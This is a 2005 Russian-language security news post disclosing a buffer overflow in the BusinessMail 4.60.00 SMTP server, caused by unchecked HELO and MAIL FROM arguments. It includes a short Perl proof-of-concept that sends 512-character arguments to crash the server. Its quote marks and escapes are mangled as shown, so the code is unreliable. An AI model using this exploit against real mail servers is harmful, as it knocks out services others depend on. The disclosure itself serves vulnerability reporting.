18.191.189.124 Человек на сайте
На сайте: 394 человек(а)
Ђдминистрация никак не связан с авторами и содержимым ссылок Рђеклама
Cервер : irc.comp-info.ru Порт : 6667 Канал : #comp-info
Архив Новостей
Переволнение буффера в BusinessMail почтовой серверной системе версии
9 августа 2005 | ASSCOL | Архив Новостей
Переволнение буффера в BusinessMail почтовой серверной системе версии 4.60.00
Детали: Комманды в SMTP HELO и MAIL FROM: не проверяються и не фильтруються. Подставление длинного аргумента для HELO и MAIL FROM: приведёт к аварийному завершению работы приложения.
Уязвимые версии: BusinnessMail email sever system 4.60.00
Патчи: Производитель был осведомлен. Обновление будет выпушенно в кратчайшие сроки.
Обновление будет выложенно на оффециальном сайте производителя (www.netcplus.com)
if ($socket = IOSocketINET->new(PeerAddr => $ARGV[0], PeerPort => «25», Proto => «TCP»)) { print «Attempting to kill BusinessMail SMTP server at $ARGV[0]:25…n»;
sleep(1);
print $socket "HELO " . «A» x 512 . «rn»;
sleep(1);
print $socket «MAIL FROM:» . «A» x 512 . «rn»;
close($socket); } else { print «Cannot connect to $ARGV[0]:25n»; }
Комментариев: 0
Все материалы предоставляются как информация к размышлению. Лица, использующие данную
информацию в противозаконных целях, могут быть привлечены к уголовной ответственности.
Администрация сайта в этих случаях ответственности не несет.